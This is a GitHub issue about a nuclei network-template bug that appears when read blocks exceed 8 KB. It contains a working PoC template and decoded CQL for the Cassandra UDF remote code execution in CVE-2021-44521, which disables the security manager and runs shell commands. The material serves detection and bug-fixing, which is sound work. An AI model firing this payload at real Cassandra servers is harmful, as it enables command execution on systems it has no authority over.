When processing network requests, if the read block is more than 1024*8, there will be an error. #1609

Closed
Y4er opened this issue Feb 17, 2022 · 1 comment · Fixed by #1663
Labels: Status: Completed (Nothing further to be done with this issue. Awaiting to be closed.); Type: Bug (Inconsistencies or issues which will cause an issue or problem for users or implementors.)

Y4er commented Feb 17, 2022

Nuclei version:

Current Version: 2.6.0

Current Behavior:

When the read data exceeds 1024*8, the debug mode does not display the response, and the requested data and order are not correct.

Expected Behavior:

When there are 9 read blocks, the corresponding response can be read.

Steps To Reproduce:

I am writing a PoC template for CVE-2021-44521; my local env is Cassandra 4.0.0 with enable_user_defined_functions_threads: false set in cassandra.yaml.

And this is my PoC:

```yaml
id: CVE-2021-44521

info:
  name: Apache Cassandra Load UDF RCE
  author: Y4er
  description: Apache Cassandra Load UDF RCE
  severity: critical
  reference: https://y4er.com/post/cve-2021-44521-apache-cassandra-udf-rce/
  tags: network,rce,apache,Cassandra,CVE-2021-44521,cve

network:
  - inputs:
      - data: "050000000500000000"
        read: 1024
        type: hex
      - data: "0500000101000000530003000b4452495645525f4e414d450016446174615374617820507974686f6e20447269766572000e4452495645525f56455253494f4e0006332e32352e30000b43514c5f56455253494f4e0005332e342e35"
        read: 1024
        type: hex
      - data: "3e000218aeb50500000307000000350000001d64726f70204b455953504143452049462045584953545320746573743b0001000000340000006400080005d82cc8ca0e4fcdde8c0a"
        read: 1024
        type: hex
      - data: "7f0002a6a69f0500000407000000760000005e435245415445204b4559535041434520746573742057495448207265706c69636174696f6e203d207b27636c617373273a202753696d706c655374726174656779272c20277265706c69636174696f6e5f666163746f7227203a20317d3b0001000000340000006400080005d82cc8ca390f0ddce06b"
        read: 1024
        type: hex
      - data: "7d000296664f0500000807000000740000005c435245415445205441424c4520746573742e7263652028636d642076617263686172205052494d415259204b455929205749544820636f6d6d656e743d27496d706f7274616e742062696f6c6f676963616c207265636f726473273b0001000000340000006400080005d82cc8cb2fc161951510"
        read: 1024
        type: hex
      - data: "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"
        read: 1024
        type: hex
      - data: "51000278033505000014070000004800000030696e7365727420696e746f20746573742e72636528636d64292076616c75657328276563686f2031323331323327293b0001000000340000006400080005d82cc8cd5b810ef0b16e"
        read: 1024
        type: hex
      - data: "450002bff1d805000015070000003c0000002473656c65637420746573742e6578656328636d64292066726f6d20746573742e7263653b0001000000340000006400080005d82cc8cd99d444271281"
        read: 1024
        type: hex
      - data: "3e000218aeb50500000307000000350000001d64726f70204b455953504143452049462045584953545320746573743b0001000000340000006400080005d82cc8ca0e4fcdde8c0a"
        type: hex
        # The problem occurs if I uncomment the next line.
        # read: 1024
    host:
      - "{{Hostname}}:9042"
    # next line also doesn't work.
    # read-all: true
    matchers:
      - type: word
        words:
          - "123123"
        part: raw
```

If I comment out the last read: 1024 line, it succeeds. The network-fingerprint result looks like this:

[root@localhost ~]# ./network-fingerprint -port 9042 -iface ens33
2022/02/16 22:51:01 network-fingerprint: nuclei-helper by @pdiscoveryio
2022/02/16 22:51:02 [device] ens33 IP: 172.16.16.9
2022/02/16 22:51:02 [device] lo IP: 127.0.0.1
{
  "data": "\u0005\u0000\u0000\u0000\u0005\u0000\u0000\u0000\u0000",
  "hex": "050000000500000000",
  "request": true
}
{
  "data": "\ufffd\u0000\u0000\u0000\u0006\u0000\u0000\u0000f\u0000\u0003\u0000\u0011PROTOCOL_VERSIONS\u0000\u0004\u0000\u00043/v3\u0000\u00044/v4\u0000\u00045/v5\u0000\t6/v6-beta\u0000\u000bCOMPRESSION\u0000\u0002\u0000\u0006snappy\u0000\u0003lz4\u0000\u000bCQL_VERSION\u0000\u0001\u0000\u00053.4.5",
  "hex": "8500000006000000660003001150524f544f434f4c5f56455253494f4e5300040004332f76330004342f76340004352f76350009362f76362d62657461000b434f4d5052455353494f4e00020006736e6170707900036c7a34000b43514c5f56455253494f4e00010005332e342e35",
  "response": true
}
{
  "data": "\u0005\u0000\u0000\u0001\u0001\u0000\u0000\u0000S\u0000\u0003\u0000\u000bDRIVER_NAME\u0000\u0016DataStax Python Driver\u0000\u000eDRIVER_VERSION\u0000\u00063.25.0\u0000\u000bCQL_VERSION\u0000\u00053.4.5",
  "hex": "0500000101000000530003000b4452495645525f4e414d450016446174615374617820507974686f6e20447269766572000e4452495645525f56455253494f4e0006332e32352e30000b43514c5f56455253494f4e0005332e342e35",
  "request": true
}
{
  "data": "\ufffd\u0000\u0000\u0001\u0002\u0000\u0000\u0000\u0000",
  "hex": "850000010200000000",
  "response": true
}
{
  "data": "\u003e\u0000\u0002\u0018\ufffd\ufffd\u0005\u0000\u0000\u0003\u0007\u0000\u0000\u00005\u0000\u0000\u0000\u001ddrop KEYSPACE IF EXISTS test;\u0000\u0001\u0000\u0000\u00004\u0000\u0000\u0000d\u0000\u0008\u0000\u0005\ufffd,\ufffd\ufffd\u000eO\ufffdތ\n",
  "hex": "3e000218aeb50500000307000000350000001d64726f70204b455953504143452049462045584953545320746573743b0001000000340000006400080005d82cc8ca0e4fcdde8c0a",
  "request": true
}
{
  "data": "\r\u0000\u0002\ufffd\u0007\ufffd\ufffd\u0000\u0000\u0003\u0008\u0000\u0000\u0000\u0004\u0000\u0000\u0000\u0001#\ufffd@\ufffd",
  "hex": "0d0002cf07f785000003080000000400000001239340f9",
  "response": true
}
{
  "data": "\u0000\u0002\ufffd\ufffd\ufffd\u0005\u0000\u0000\u0004\u0007\u0000\u0000\u0000v\u0000\u0000\u0000^CREATE KEYSPACE test WITH replication = {'class': 'SimpleStrategy', 'replication_factor' : 1};\u0000\u0001\u0000\u0000\u00004\u0000\u0000\u0000d\u0000\u0008\u0000\u0005\ufffd,\ufffd\ufffd9\u000f\r\ufffd\ufffdk",
  "hex": "7f0002a6a69f0500000407000000760000005e435245415445204b4559535041434520746573742057495448207265706c69636174696f6e203d207b27636c617373273a202753696d706c655374726174656779272c20277265706c69636174696f6e5f666163746f7227203a20317d3b0001000000340000006400080005d82cc8ca390f0ddce06b",
  "request": true
}
{
  "data": "\u0026\u0000\u0002b\r\u0003\ufffd\u0000\u0000\u0004\u0008\u0000\u0000\u0000\u001d\u0000\u0000\u0000\u0005\u0000\u0007CREATED\u0000\u0008KEYSPACE\u0000\u0004testx\ufffdVY",
  "hex": "260002620d0385000004080000001d0000000500074352454154454400084b4559535041434500047465737478915659",
  "response": true
}
{
  "data": "}\u0000\u0002\ufffdfO\u0005\u0000\u0000\u0008\u0007\u0000\u0000\u0000t\u0000\u0000\u0000\\CREATE TABLE test.rce (cmd varchar PRIMARY KEY) WITH comment='Important biological records';\u0000\u0001\u0000\u0000\u00004\u0000\u0000\u0000d\u0000\u0008\u0000\u0005\ufffd,\ufffd\ufffd/\ufffda\ufffd\u0015\u0010",
  "hex": "7d000296664f0500000807000000740000005c435245415445205441424c4520746573742e7263652028636d642076617263686172205052494d415259204b455929205749544820636f6d6d656e743d27496d706f7274616e742062696f6c6f676963616c207265636f726473273b0001000000340000006400080005d82cc8cb2fc161951510",
  "request": true
}
{
  "data": "(\u0000\u0002\ufffd\u0000\u0000\u0008\u0008\u0000\u0000\u0000\u001f\u0000\u0000\u0000\u0005\u0000\u0007CREATED\u0000\u0005TABLE\u0000\u0004test\u0000\u0003rce\ufffd[\u0008\ufffd",
  "hex": "280002ef9c8885000008080000001f0000000500074352454154454400055441424c450004746573740003726365bb5b08db",
  "response": true
}
{
  "data": "\u001c\u0003\u0002\ufffd\ufffd4\u0005\u0000\u0000\u0010\u0007\u0000\u0000\u0003\u0013\u0000\u0000\u0002\ufffdcreate or replace FUNCTION test.exec( cmd text )\r\n    RETURNS NULL ON NULL INPUT\r\n    RETURNS text\r\n    LANGUAGE javascript\r\n    AS $$\r\n    var System = Java.type(\"java.lang.System\");System.setSecurityManager(null);\r\n    var e =this.engine.factory.scriptEngine.eval('var osname = java.lang.System.getProperty(\"os.name\");osname = osname.toLowerCase();var split = osname.startsWith(\"win\") ? \"/c\" : \"-c\";var cmdPath = osname.startsWith(\"win\") ? \"cmd\" : \"bash\";var command = \"'+cmd+'\";var s = [cmdPath, split, command];p = java.lang.Runtime.getRuntime().exec(s);var br = new java.io.BufferedReader(new java.io.InputStreamReader(p.getInputStream()));var res=\"\";while ((l = br.readLine()) != null) {    res+=l;res+=java.lang.System.lineSeparator();}');\r\n    e;\r\n    $$;\u0000\u0001\u0000\u0000\u00004\u0000\u0000\u0000d\u0000\u0008\u0000\u0005\ufffd,\ufffd\ufffd~Ήdl\ufffd",
  "hex": "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",
  "request": true
}
{
  "data": "4\u0000\u0002\ufffd\ufffd\u0008\ufffd\u0000\u0000\u0010\u0008\u0000\u0000\u0000+\u0000\u0000\u0000\u0005\u0000\u0007CREATED\u0000\u0008FUNCTION\u0000\u0004test\u0000\u0004exec\u0000\u0001\u0000\u0004text\ufffd1\u0000,",
  "hex": "340002fef00885000010080000002b00000005000743524541544544000846554e4354494f4e0004746573740004657865630001000474657874a131002c",
  "response": true
}
{
  "data": "Q\u0000\u0002x\u00035\u0005\u0000\u0000\u0014\u0007\u0000\u0000\u0000H\u0000\u0000\u00000insert into test.rce(cmd) values('echo 123123');\u0000\u0001\u0000\u0000\u00004\u0000\u0000\u0000d\u0000\u0008\u0000\u0005\ufffd,\ufffd\ufffd[\ufffd\u000e\ufffd\ufffdn",
  "hex": "51000278033505000014070000004800000030696e7365727420696e746f20746573742e72636528636d64292076616c75657328276563686f2031323331323327293b0001000000340000006400080005d82cc8cd5b810ef0b16e",
  "request": true
}
{
  "data": "\r\u0000\u0002\ufffd\u0007\ufffd\ufffd\u0000\u0000\u0014\u0008\u0000\u0000\u0000\u0004\u0000\u0000\u0000\u0001\ufffd\t2\u003c",
  "hex": "0d0002cf07f785000014080000000400000001b209323c",
  "response": true
}
{
  "data": "E\u0000\u0002\ufffd\ufffd\ufffd\u0005\u0000\u0000\u0015\u0007\u0000\u0000\u0000\u003c\u0000\u0000\u0000$select test.exec(cmd) from test.rce;\u0000\u0001\u0000\u0000\u00004\u0000\u0000\u0000d\u0000\u0008\u0000\u0005\ufffd,\ufffd͙\ufffdD'\u0012\ufffd",
  "hex": "450002bff1d805000015070000003c0000002473656c65637420746573742e6578656328636d64292066726f6d20746573742e7263653b0001000000340000006400080005d82cc8cd99d444271281",
  "request": true
}
{
  "data": "A\u0000\u0002\ufffd\u003e\ufffd\ufffd\u0000\u0000\u0015\u0008\u0000\u0000\u00008\u0000\u0000\u0000\u0002\u0000\u0000\u0000\u0001\u0000\u0000\u0000\u0001\u0000\u0004test\u0000\u0003rce\u0000\u000etest.exec(cmd)\u0000\r\u0000\u0000\u0000\u0001\u0000\u0000\u0000\u0007123123\n\u0005\ufffdO\u0026",
  "hex": "410002d43eee8500001508000000380000000200000001000000010004746573740003726365000e746573742e6578656328636d6429000d00000001000000073132333132330a05ed4f26",
  "response": true
}
{
  "data": "\u003e\u0000\u0002\u0018\ufffd\ufffd\u0005\u0000\u0000\u0003\u0007\u0000\u0000\u00005\u0000\u0000\u0000\u001ddrop KEYSPACE IF EXISTS test;\u0000\u0001\u0000\u0000\u00004\u0000\u0000\u0000d\u0000\u0008\u0000\u0005\ufffd,\ufffd\ufffd\u000eO\ufffdތ\n",
  "hex": "3e000218aeb50500000307000000350000001d64726f70204b455953504143452049462045584953545320746573743b0001000000340000006400080005d82cc8ca0e4fcdde8c0a",
  "request": true
}
{
  "data": "\u0026\u0000\u0002b\r\u0003\ufffd\u0000\u0000\u0003\u0008\u0000\u0000\u0000\u001d\u0000\u0000\u0000\u0005\u0000\u0007DROPPED\u0000\u0008KEYSPACE\u0000\u0004test\ufffd\ufffdY\ufffd",
  "hex": "260002620d0385000003080000001d00000005000744524f5050454400084b45595350414345000474657374e7f15981",
  "response": true
}

The request sends SQL to create a UDF in Cassandra. The SQL is this:

```sql
drop KEYSPACE IF EXISTS test;
CREATE KEYSPACE test WITH replication = {'class': 'SimpleStrategy', 'replication_factor' : 1};
CREATE TABLE test.rce (cmd varchar PRIMARY KEY) WITH comment='Important biological records';
create or replace FUNCTION test.exec( cmd text )
    RETURNS NULL ON NULL INPUT
    RETURNS text
    LANGUAGE javascript
    AS $$
    var System = Java.type("java.lang.System");System.setSecurityManager(null);
    var e =this.engine.factory.scriptEngine.eval('var osname = java.lang.System.getProperty("os.name");osname = osname.toLowerCase();var split = osname.startsWith("win") ? "/c" : "-c";var cmdPath = osname.startsWith("win") ? "cmd" : "bash";var command = "'+cmd+'";var s = [cmdPath, split, command];p = java.lang.Runtime.getRuntime().exec(s);var br = new java.io.BufferedReader(new java.io.InputStreamReader(p.getInputStream()));var res="";while ((l = br.readLine()) != null) {    res+=l;res+=java.lang.System.lineSeparator();}');
    e;
    $$;
insert into test.rce(cmd) values('echo 123123');
select test.exec(cmd) from test.rce;
drop KEYSPACE test;
```

The debug mode result is this:

[image: debug mode output]

But if I uncomment the last read block, no response info is displayed for me.

I guess maybe nuclei sets a max buffer for the socket's received response?

When the read block is more than 1024*8, there is no response to display.

Anything else:

About CVE-2021-44521, you can read these posts:

  1. https://y4er.com/post/cve-2021-44521-apache-cassandra-udf-rce/
  2. https://jfrog.com/blog/cve-2021-44521-exploiting-apache-cassandra-user-defined-functions-for-remote-code-execution/
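The capture above is raw CQL native protocol, and each `read:` in the template is a byte budget for one server reply. The decoder below is an added example (not code from the issue or from nuclei) that parses the captured hex: the pre-STARTUP OPTIONS/SUPPORTED exchange is bare 9-byte-header frames, while after STARTUP the protocol v5 session wraps each frame in a segment (3-byte little-endian header carrying a 17-bit payload length and a self-contained flag, a CRC24, the payload, and a trailing CRC32). It reports how many wire bytes each message occupies, which is what a fixed `read: 1024` has to cover. Assumptions: the two CRC fields are skipped rather than verified, and only the QUERY and RESULT bodies the capture contains are decoded.

```python
"""Decode the CQL native-protocol bytes captured with network-fingerprint above.

Added example, not code from the issue or from nuclei. Messages before STARTUP
completes (OPTIONS/SUPPORTED) are bare frames with a 9-byte header; afterwards,
protocol v5 wraps every frame in a segment: a 3-byte little-endian header
(17-bit payload length, bit 17 = self-contained flag), a 3-byte CRC24, the
payload, and a trailing 4-byte CRC32. Simplifying assumption: both CRCs are
skipped, not verified; a real client must check them.
"""
import struct

OPCODES = {0x00: "ERROR", 0x01: "STARTUP", 0x02: "READY", 0x05: "OPTIONS",
           0x06: "SUPPORTED", 0x07: "QUERY", 0x08: "RESULT"}
RESULT_KINDS = {1: "Void", 2: "Rows", 3: "Set_keyspace", 4: "Prepared",
                5: "Schema_change"}

# Hex copied verbatim from the capture in the issue, split at field boundaries.
OPTIONS_REQ = "050000000500000000"                     # bare frame, client -> server
SUPPORTED_RESP = ("850000000600000066" "0003"           # bare frame, server -> client
                  "001150524f544f434f4c5f56455253494f4e53"
                  "00040004332f76330004342f76340004352f76350009362f76362d62657461"
                  "000b434f4d5052455353494f4e" "00020006736e6170707900036c7a34"
                  "000b43514c5f56455253494f4e" "00010005332e342e35")
DROP_KS_REQ = ("3e000218aeb5" "050000030700000035" "0000001d"   # v5 segment
               "64726f70204b455953504143452049462045584953545320746573743b"
               "0001000000340000006400080005d82cc8ca0e4f" "cdde8c0a")
DROP_KS_RESP = "0d0002cf07f7" "850000030800000004" "00000001" "239340f9"
CREATE_KS_RESP = ("260002620d03" "85000004080000001d" "00000005"
                  "000743524541544544" "00084b45595350414345" "000474657374"
                  "78915659")


def read_string(buf, off):
    """[string] = 2-byte big-endian length followed by UTF-8 bytes."""
    n = struct.unpack_from(">H", buf, off)[0]
    return buf[off + 2:off + 2 + n].decode(), off + 2 + n


def parse_frame(buf):
    """Parse one frame (9-byte header + body); return (info, bytes consumed)."""
    if len(buf) < 9:
        raise ValueError("need 9 header bytes, have %d" % len(buf))
    version, flags, stream, opcode, length = struct.unpack_from(">BBhBI", buf, 0)
    if len(buf) < 9 + length:
        raise ValueError("frame needs %d bytes, have %d" % (9 + length, len(buf)))
    body = buf[9:9 + length]
    info = {"version": version & 0x7F, "response": bool(version & 0x80),
            "stream": stream, "opcode": OPCODES.get(opcode, "0x%02x" % opcode),
            "length": length}
    if opcode == 0x07:                       # QUERY: [long string] query, ...
        qlen = struct.unpack_from(">I", body, 0)[0]
        info["query"] = body[4:4 + qlen].decode()
    elif opcode == 0x08:                     # RESULT: [int] kind, ...
        kind = struct.unpack_from(">I", body, 0)[0]
        info["result"] = RESULT_KINDS.get(kind, kind)
        if kind == 5:                        # Schema_change: change, target, keyspace
            change, off = read_string(body, 4)
            target, off = read_string(body, off)
            keyspace, off = read_string(body, off)
            info["schema_change"] = (change, target, keyspace)
    return info, 9 + length


def parse_segment(buf):
    """Unwrap one v5 segment; return (payload, self_contained, bytes consumed)."""
    if len(buf) < 6:
        raise ValueError("need 6 segment header bytes, have %d" % len(buf))
    hdr = buf[0] | (buf[1] << 8) | (buf[2] << 16)   # 3-byte little-endian header
    payload_len = hdr & 0x1FFFF
    self_contained = bool((hdr >> 17) & 1)
    total = 6 + payload_len + 4                      # header+CRC24, payload, CRC32
    if len(buf) < total:
        raise ValueError("segment needs %d bytes, have %d" % (total, len(buf)))
    return buf[6:6 + payload_len], self_contained, total   # CRCs skipped (assumption)


def decode(hexdata, framed):
    """Decode one captured message; wire_bytes is what a single read must cover."""
    raw = bytes.fromhex(hexdata)
    if framed:
        payload, self_contained, total = parse_segment(raw)
        info, _ = parse_frame(payload)
        info["self_contained"] = self_contained
    else:
        info, total = parse_frame(raw)
    info["wire_bytes"] = total
    return info


CAPTURE = [("OPTIONS", OPTIONS_REQ, False), ("SUPPORTED", SUPPORTED_RESP, False),
           ("QUERY", DROP_KS_REQ, True), ("RESULT void", DROP_KS_RESP, True),
           ("RESULT schema change", CREATE_KS_RESP, True)]


def max_wire_bytes(capture=CAPTURE):
    """Largest single message in the capture, i.e. the smallest safe `read:`."""
    return max(decode(h, f)["wire_bytes"] for _, h, f in capture)


if __name__ == "__main__":
    for label, h, f in CAPTURE:
        print(label, decode(h, f))
    print("largest message: %d bytes" % max_wire_bytes())
```

Every reply in the capture is well under 1024 bytes (the largest is the 111-byte SUPPORTED message), so the per-step `read: 1024` budget itself was not what starved the last step; the maintainer's reply below traces the missing output to read errors that were not surfaced. The same decoder lets you size `read:` for other Cassandra steps from a capture instead of guessing, and it flags a truncated read with a ValueError rather than silently returning a partial frame.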
@Y4er Y4er added the Type: Bug Inconsistencies or issues which will cause an issue or problem for users or implementors. label Feb 17, 2022
@ehsandeep ehsandeep added the Priority: Medium This issue may be useful, and needs some attention. label Feb 24, 2022
@Ice3man543 Ice3man543 self-assigned this Mar 1, 2022
Ice3man543 (Member) commented:
@Y4er Thank you for reporting the issue. I was able to reproduce the problem and trace the issue to the error handling code responsible for dealing with network related errors during reading. The problem was the errors occurring during reading weren't being propagated to the user, and since the server had no response to send, the connection was timing out which caused nuclei to exit without any response. A fix has been created and this should be fixed with the next release.

@ehsandeep ehsandeep linked a pull request Mar 1, 2022 that will close this issue
@ehsandeep ehsandeep added Status: Completed Nothing further to be done with this issue. Awaiting to be closed. and removed Priority: Medium This issue may be useful, and needs some attention. labels Mar 2, 2022
@ehsandeep ehsandeep added this to the v2.6.3 milestone Mar 3, 2022